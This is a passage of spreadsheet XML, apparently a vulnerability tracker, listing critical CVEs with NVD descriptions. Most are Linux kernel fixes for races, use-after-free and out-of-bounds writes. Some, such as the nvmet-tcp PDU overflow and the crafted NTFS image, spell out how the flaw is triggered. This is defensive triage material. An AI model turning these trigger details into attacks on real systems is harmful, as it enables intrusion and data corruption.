          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89847</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B52" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C52" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89857</t>
        </is>
      </c>
      <c r="D52" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E52" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F52" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G52" s="5" t="inlineStr"/>
      <c r="H52" s="5" t="inlineStr"/>
      <c r="I52" s="5" t="inlineStr"/>
      <c r="J52" s="5" t="inlineStr"/>
      <c r="K52" s="5" t="inlineStr"/>
      <c r="L52" s="5" t="inlineStr"/>
      <c r="M52" s="5" t="inlineStr"/>
      <c r="N52" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O52" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P52" s="5" t="inlineStr"/>
      <c r="Q52" s="5" t="inlineStr"/>
      <c r="R52" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Hold qpair lock when sending NVMe LS reject
qla_nvme_ls_reject_iocb() allocates from and advances the request ring
through __qla2x00_alloc_iocbs() (which assumes the hardware_lock is
held) and qla2x00_start_iocbs() (which advances the ring and rings the
request-in doorbell), but takes no lock itself. Two of its callers
invoke it without the producer lock held:
 - qla_nvme_xmt_ls_rsp(), the NVMe-FC .xmt_ls_rsp transport callback, on
   its error path, and
 - qla2xxx_process_purls_pkt(), run from the purex work/DPC context.
Both use ha-&gt;base_qpair, whose qp_lock_ptr is hardware_lock, so they can
run concurrently with normal I/O submission on the base ring and corrupt
the ring producer state, leading to duplicated or dropped commands. The
third caller, qla2xxx_process_purls_iocb(), runs inside
qla24xx_process_response_queue() with the qpair lock already held and is
safe; that is also why the lock cannot be taken inside the helper itself
(it would recursively re-acquire hardware_lock on the response path).
Take qp_lock_ptr around the two unlocked callers and document the helper
as caller-locked. Both run in process context, so spin_lock_irqsave() is
used and nothing in the locked region sleeps.</t>
        </is>
      </c>
      <c r="S52" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89857</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B53" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C53" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89969</t>
        </is>
      </c>
      <c r="D53" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E53" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F53" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G53" s="5" t="inlineStr"/>
      <c r="H53" s="5" t="inlineStr"/>
      <c r="I53" s="5" t="inlineStr"/>
      <c r="J53" s="5" t="inlineStr"/>
      <c r="K53" s="5" t="inlineStr"/>
      <c r="L53" s="5" t="inlineStr"/>
      <c r="M53" s="5" t="inlineStr"/>
      <c r="N53" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O53" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P53" s="5" t="inlineStr"/>
      <c r="Q53" s="5" t="inlineStr"/>
      <c r="R53" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvmet-tcp: fix out-of-bounds write when receiving an over-long PDU
nvmet_tcp_try_recv_pdu() reads a PDU header into the fixed 128-byte
queue-&gt;pdu union, then computes the remaining payload length as
	queue-&gt;left = hdr-&gt;hlen - queue-&gt;offset + hdgst;
and reads that many more bytes into &amp;queue-&gt;pdu + queue-&gt;offset, without
ever bounding the result against sizeof(queue-&gt;pdu).
A struct nvme_tcp_icreq_pdu is itself 128 bytes, exactly the size of the
union. Once a header digest has been negotiated (hdgst = 4), a second
ICReq passes the hlen == nvmet_tcp_pdu_size() check but yields
queue-&gt;left = 128 - 8 + 4 = 124, so bytes 8..132 are written into the
128-byte buffer -- 4 bytes past its end, over queue-&gt;hdr_digest and
queue-&gt;data_digest. Those bytes are attacker-controlled (an ICReq
carries no digest), and the duplicate ICReq is only rejected later,
after the overflow. A remote unauthenticated host can thus corrupt
kernel memory adjacent to the receive buffer.
Reject any PDU whose declared length would read past the end of
queue-&gt;pdu before the second recv.</t>
        </is>
      </c>
      <c r="S53" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89969</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B54" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C54" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89970</t>
        </is>
      </c>
      <c r="D54" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E54" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F54" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G54" s="5" t="inlineStr"/>
      <c r="H54" s="5" t="inlineStr"/>
      <c r="I54" s="5" t="inlineStr"/>
      <c r="J54" s="5" t="inlineStr"/>
      <c r="K54" s="5" t="inlineStr"/>
      <c r="L54" s="5" t="inlineStr"/>
      <c r="M54" s="5" t="inlineStr"/>
      <c r="N54" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O54" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P54" s="5" t="inlineStr"/>
      <c r="Q54" s="5" t="inlineStr"/>
      <c r="R54" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvmet-auth: Synchronize timeout work during SQ teardown
nvmet_auth_sq_free() cancels auth_expired_work with
cancel_delayed_work(). If the work has already started, cancellation does
not wait for the callback. Transport teardown can consequently free or
reuse the queue containing struct nvmet_sq while
nvmet_auth_expired_work() still accesses that SQ.
Add a teardown-specific helper that synchronously drains the delayed work
before freeing authentication state, and use it from nvmet_sq_destroy().
Keep the non-synchronous helper for in-band authentication state cleanup,
where the SQ owner remains alive.</t>
        </is>
      </c>
      <c r="S54" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89970</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B55" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C55" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89972</t>
        </is>
      </c>
      <c r="D55" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E55" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F55" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G55" s="5" t="inlineStr"/>
      <c r="H55" s="5" t="inlineStr"/>
      <c r="I55" s="5" t="inlineStr"/>
      <c r="J55" s="5" t="inlineStr"/>
      <c r="K55" s="5" t="inlineStr"/>
      <c r="L55" s="5" t="inlineStr"/>
      <c r="M55" s="5" t="inlineStr"/>
      <c r="N55" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O55" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P55" s="5" t="inlineStr"/>
      <c r="Q55" s="5" t="inlineStr"/>
      <c r="R55" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvme: add missing SRCU grace period in error path
nvme_alloc_ns() error path at out_unlink_ns removes ns from the
namespace head siblings list with list_del_rcu(&amp;ns-&gt;siblings) but
does not wait for SRCU readers before freeing the namespace struct.
Multipath code iterates the head-&gt;list under srcu_read_lock() in
nvme_find_path() and nvme_mpath_revalidate_paths(), so a concurrent
reader can still hold a reference to ns when kfree(ns) runs.
The normal removal path in nvme_ns_remove() correctly calls
synchronize_srcu(&amp;ns-&gt;head-&gt;srcu) after list_del_rcu() to wait for
in-progress readers. Add the same grace period in the error path.</t>
        </is>
      </c>
      <c r="S55" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89972</t>
        </is>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B56" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C56" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89990</t>
        </is>
      </c>
      <c r="D56" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E56" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F56" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G56" s="5" t="inlineStr"/>
      <c r="H56" s="5" t="inlineStr"/>
      <c r="I56" s="5" t="inlineStr"/>
      <c r="J56" s="5" t="inlineStr"/>
      <c r="K56" s="5" t="inlineStr"/>
      <c r="L56" s="5" t="inlineStr"/>
      <c r="M56" s="5" t="inlineStr"/>
      <c r="N56" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O56" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P56" s="5" t="inlineStr"/>
      <c r="Q56" s="5" t="inlineStr"/>
      <c r="R56" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ceph: lock mutex in ceph_mds_check_access()
MDS session OPEN handling replaces mdsc-&gt;s_cap_auths under
mdsc-&gt;mutex, freeing the previous array and its strings.
ceph_mds_check_access() traverses this array without holding the
mutex.  A concurrent session reopen can therefore free the array while
it is being inspected, resulting in a use-after-free like this:
  Unable to handle kernel paging request at virtual address 003aaad64b2c8bb9
  [...]
  Internal error: Oops: 0000000096000004 [#1]  SMP
  Modules linked in:
  CPU: 56 UID: 2953037534 PID: 1253231 Comm: php-cgi8.4 Not tainted 6.18.45-i2-ampere #1146 NONE
  [..]
  pc : ceph_mds_check_access+0xd4/0x550
  lr : ceph_mds_check_access+0xc8/0x550
  [...]
  Call trace:
   ceph_mds_check_access+0xd4/0x550 (P)
   ceph_atomic_open+0x138/0xbe8
   path_openat+0xa24/0xfa8
   do_filp_open+0x94/0x158
   do_sys_openat2+0x88/0xf8</t>
        </is>
      </c>
      <c r="S56" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89990</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B57" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C57" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90012</t>
        </is>
      </c>
      <c r="D57" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E57" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F57" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G57" s="5" t="inlineStr"/>
      <c r="H57" s="5" t="inlineStr"/>
      <c r="I57" s="5" t="inlineStr"/>
      <c r="J57" s="5" t="inlineStr"/>
      <c r="K57" s="5" t="inlineStr"/>
      <c r="L57" s="5" t="inlineStr"/>
      <c r="M57" s="5" t="inlineStr"/>
      <c r="N57" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O57" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P57" s="5" t="inlineStr"/>
      <c r="Q57" s="5" t="inlineStr"/>
      <c r="R57" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
spi: Fix DMA mapping ownership on partial map failure
If RX mapping fails after TX mapping succeeds, __spi_map_msg() unmaps
TX but leaves tx_sg_mapped set. If TX mapping fails on a later
transfer, mappings created for earlier transfers remain active.
In both cases, cur_{tx,rx}_dma_dev have not yet been updated because they
are assigned only after every transfer has been mapped. The subsequent
spi_unmap_msg() may therefore unmap the TX mapping again or release
earlier mappings using a NULL or stale device. Using a NULL device can
trigger an oops. An empty SG table does not prevent the NULL dereference
because dma_unmap_sg_attrs() accesses the device before checking the
entry count.
Publish both mapping devices before mapping starts and unwind all
failures through __spi_unmap_msg(). This clears the mapping flags and
releases each mapping once with the device that created it.
Publishing the devices before the loop also refreshes them when no
transfer needs mapping. No mapping flag is set in that case, so current
users do not use the pointers as mapping owners.</t>
        </is>
      </c>
      <c r="S57" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90012</t>
        </is>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B58" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C58" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90036</t>
        </is>
      </c>
      <c r="D58" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E58" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F58" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G58" s="5" t="inlineStr"/>
      <c r="H58" s="5" t="inlineStr"/>
      <c r="I58" s="5" t="inlineStr"/>
      <c r="J58" s="5" t="inlineStr"/>
      <c r="K58" s="5" t="inlineStr"/>
      <c r="L58" s="5" t="inlineStr"/>
      <c r="M58" s="5" t="inlineStr"/>
      <c r="N58" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O58" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P58" s="5" t="inlineStr"/>
      <c r="Q58" s="5" t="inlineStr"/>
      <c r="R58" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
NFSD: Prevent client use-after-free during blocked-lock reaping
A bare lock owner -- its only remaining reference a blocked lock on
nn-&gt;blocked_locks_lru -- holds a raw pointer to its nfs4_client but
no reference keeping the client alive. When the per-net laundromat
reaps such a lock, freeing the nbl drops the owner reference
held through flc_owner, and the final nfs4_put_stateowner()
takes the client's cl_lock. Because the laundromat detaches the
nbl first, __destroy_client() no longer finds it, so a concurrent
force_expire_client() can free the client before nfs4_put_stateowner()
runs, dereferencing cl_lock in freed memory.
Pin the client with cl_rpc_users before dropping
nn-&gt;blocked_locks_lock, and skip clients already expiring, whose
blocked locks __destroy_client() frees while holding an owner
reference. Take nn-&gt;client_lock outside nn-&gt;blocked_locks_lock.
Every other site holds nn-&gt;blocked_locks_lock as a leaf, acquiring
no further lock, so placing nn-&gt;client_lock outside it cannot form
a lock-order cycle.</t>
        </is>
      </c>
      <c r="S58" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90036</t>
        </is>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B59" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C59" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90037</t>
        </is>
      </c>
      <c r="D59" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E59" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F59" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G59" s="5" t="inlineStr"/>
      <c r="H59" s="5" t="inlineStr"/>
      <c r="I59" s="5" t="inlineStr"/>
      <c r="J59" s="5" t="inlineStr"/>
      <c r="K59" s="5" t="inlineStr"/>
      <c r="L59" s="5" t="inlineStr"/>
      <c r="M59" s="5" t="inlineStr"/>
      <c r="N59" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O59" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P59" s="5" t="inlineStr"/>
      <c r="Q59" s="5" t="inlineStr"/>
      <c r="R59" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
NFSD: Prevent client use-after-free during close_lru reaping
An nfs4_openowner left on nn-&gt;close_lru after its final CLOSE keeps
its last closed stateid in oo_last_closed_stid, holding only a raw
pointer to its nfs4_client. The laundromat reaps timed-out entries,
drops nn-&gt;client_lock, and calls nfs4_put_stid(), which dereferences
the client through cl_lock. Nothing pins the client across that
window, so a concurrent force_expire_client() can free it and
nfs4_put_stid() reads freed memory. __destroy_client() hits the same
race, walking clp-&gt;cl_openowners without cl_lock.
Pin the client with cl_rpc_users before dropping client_lock, and
skip clients already expiring. __destroy_client() then cleans up its
own close_lru entries through release_last_closed_stateid(), so
teardown no longer races the laundromat.</t>
        </is>
      </c>
      <c r="S59" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90037</t>
        </is>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B60" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C60" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90038</t>
        </is>
      </c>
      <c r="D60" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E60" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F60" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G60" s="5" t="inlineStr"/>
      <c r="H60" s="5" t="inlineStr"/>
      <c r="I60" s="5" t="inlineStr"/>
      <c r="J60" s="5" t="inlineStr"/>
      <c r="K60" s="5" t="inlineStr"/>
      <c r="L60" s="5" t="inlineStr"/>
      <c r="M60" s="5" t="inlineStr"/>
      <c r="N60" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O60" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P60" s="5" t="inlineStr"/>
      <c r="Q60" s="5" t="inlineStr"/>
      <c r="R60" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
NFSD: Prevent client use-after-free during export state revocation
nfsd4_revoke_export_states() has the same use-after-free as
nfsd4_revoke_states(): it drops nn-&gt;client_lock across
revoke_one_stid() and the following read of clp-&gt;cl_minorversion, but
the stateid reference it holds does not pin the client.  A teardown
racing the dropped lock can free the client while revoke_one_stid()
still dereferences it.
exportfs -u drives this path through NFSD_CMD_UNLOCK_EXPORT, so an
administrator removing an export can race a client expiry.
Skip a client that is already expiring and otherwise pin it with
cl_rpc_users under client_lock before dropping the lock, matching
nfsd4_revoke_states().</t>
        </is>
      </c>
      <c r="S60" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90038</t>
        </is>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B61" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C61" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90042</t>
        </is>
      </c>
      <c r="D61" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E61" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F61" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G61" s="5" t="inlineStr"/>
      <c r="H61" s="5" t="inlineStr"/>
      <c r="I61" s="5" t="inlineStr"/>
      <c r="J61" s="5" t="inlineStr"/>
      <c r="K61" s="5" t="inlineStr"/>
      <c r="L61" s="5" t="inlineStr"/>
      <c r="M61" s="5" t="inlineStr"/>
      <c r="N61" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O61" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P61" s="5" t="inlineStr"/>
      <c r="Q61" s="5" t="inlineStr"/>
      <c r="R61" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ceph: properly decrypt filenames in vmalloc() buffers
The fscrypt subsystem uses the scatterlist crypto API, inheriting its
requirement that any buffers are in the linear mapping region. However,
the messenger client uses kvmalloc() to create buffers for messages,
which will occasionally place those buffers in the vmalloc() region when
physical memory fragmentation doesn't permit a large enough kmalloc().
The various callers of ceph_fname_to_usr() directly pass (slices of) raw
messages from the MDS without considering that the messages may be in
vmalloc() buffers, resulting in oopses especially on non-x86 platforms
(see 'Closes:' for more details and a reproducer).
Make ceph_fname_to_usr() explicitly tolerant of vmalloc()-allocated
fname-&gt;ctext, fname-&gt;name, and/or oname-&gt;name buffers, using `tname`
(which, when non-null, must be a linear address; when null, is briefly
allocated as necessary) as a bounce buffer to avoid passing any
inappropriate addresses to fscrypt_fname_disk_to_usr().
Additionally change parse_reply_info_readdir() -- the only function to
supply its own `tname` -- to follow the new "tname must never come from
vmalloc()" rule by passing NULL when the message is not in the linear
region. Though this causes a per-dentry kmalloc()+kfree(), this overhead
exists only when processing the minority of messages that spill into
vmalloc(). My (crude) testing puts this at only about 1 in 8,000 readdir
messages. Still, if the overhead proves unreasonable in the future, it
is easy enough to mitigate: a future change could allocate a bounce
buffer in parse_reply_info_readdir() and use that as `tname` instead.</t>
        </is>
      </c>
      <c r="S61" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90042</t>
        </is>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B62" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C62" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90048</t>
        </is>
      </c>
      <c r="D62" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E62" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F62" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G62" s="5" t="inlineStr"/>
      <c r="H62" s="5" t="inlineStr"/>
      <c r="I62" s="5" t="inlineStr"/>
      <c r="J62" s="5" t="inlineStr"/>
      <c r="K62" s="5" t="inlineStr"/>
      <c r="L62" s="5" t="inlineStr"/>
      <c r="M62" s="5" t="inlineStr"/>
      <c r="N62" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O62" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P62" s="5" t="inlineStr"/>
      <c r="Q62" s="5" t="inlineStr"/>
      <c r="R62" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fs/ntfs3: fix slab-out-of-bounds write in ni_create_attr_list()
ni_create_attr_list() allocates a fixed buffer of al_aligned(record_size)
(== record_size) bytes and then walks every attribute of the primary MFT
record, writing one ATTR_LIST_ENTRY per attribute and advancing the cursor
by le_size(name_len), with no check against the end of the buffer; the
total size is only computed after the loop.
A minimum-size resident attribute occupies SIZEOF_RESIDENT (0x18 = 24)
bytes on disk, but an unnamed attribute expands to le_size(0) (0x20 = 32)
bytes in the list.  Because the number of attributes in a record is not
bounded (mi_enum_attr() accepts arbitrarily many equal-type, nameless
minimum-size attributes), a crafted record packed with such attributes
produces a list larger than record_size and overflows the heap buffer.
This is reachable from a crafted, loop-mounted NTFS image: opening the file
and adding an attribute (e.g. via setxattr) drives ntfs_set_ea() -&gt;
ni_insert_resident() -&gt; ni_insert_attr() -&gt; ni_ins_attr_ext() -&gt;
ni_create_attr_list().
  BUG: KASAN: slab-out-of-bounds in ni_create_attr_list+0xc48/0x1058
  Write of size 4 at addr ffff000008984c00 by task setfattr/345
   ni_create_attr_list+0xc48/0x1058
   ni_ins_attr_ext+0x510/0x7c0
   ni_insert_attr+0x3f8/0x70c
   ni_insert_resident+0xc8/0x3b0
   ntfs_set_ea+0x66c/0xd28
   ntfs_setxattr+0x4d8/0x5b0
   __arm64_sys_setxattr+0xa4/0x124
  Allocated by task 345:
   ni_create_attr_list+0x188/0x1058
  The buggy address belongs to the cache kmalloc-1k of size 1024
  (the write lands at object+1024).
Size the buffer from the actual attributes instead of assuming a single
record_size is always enough.</t>
        </is>
      </c>
      <c r="S62" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90048</t>
        </is>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B63" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C63" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91843</t>
        </is>
      </c>
      <c r="D63" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E63" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F63" s="5" t="inlineStr">
        <is>
          <t>cve@checkpoint.com</t>
        </is>
      </c>
      <c r="G63" s="5" t="inlineStr"/>
      <c r="H63" s="5" t="inlineStr"/>
      <c r="I63" s="5" t="inlineStr"/>
      <c r="J63" s="5" t="inlineStr"/>
      <c r="K63" s="5" t="inlineStr"/>
      <c r="L63" s="5" t="inlineStr"/>
      <c r="M63" s="5" t="inlineStr"/>
      <c r="N63" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O63" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P63" s="5" t="inlineStr"/>
      <c r="Q63" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R63" s="5" t="inlineStr">
        <is>
          <t>A stack overflow during the unauthenticated login process may allow an attacker to run arbitrary code remotely with root privileges.</t>
        </is>
      </c>
      <c r="S63" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91843</t>
        </is>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B64" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C64" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92787</t>
        </is>
      </c>
      <c r="D64" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E64" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F64" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G64" s="5" t="inlineStr"/>
      <c r="H64" s="5" t="inlineStr"/>
      <c r="I64" s="5" t="inlineStr"/>
      <c r="J64" s="5" t="inlineStr"/>
      <c r="K64" s="5" t="inlineStr"/>
      <c r="L64" s="5" t="inlineStr"/>
      <c r="M64" s="5" t="inlineStr"/>
      <c r="N64" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O64" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P64" s="5" t="inlineStr"/>
      <c r="Q64" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="R64" s="5" t="inlineStr">
        <is>
          <t>Feast through 0.66.0 fails to verify JWT token signatures before establishing user identity, allowing attackers to bypass all role-based access control by presenting an unverified token with a hardcoded claim value. Attackers can obtain trusted internal identity and gain unchecked read and write access to all entities, feature views, data sources, and permission policies on the server.</t>
        </is>
      </c>
      <c r="S64" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92787</t>
        </is>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B65" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C65" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92805</t>
        </is>
      </c>
      <c r="D65" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
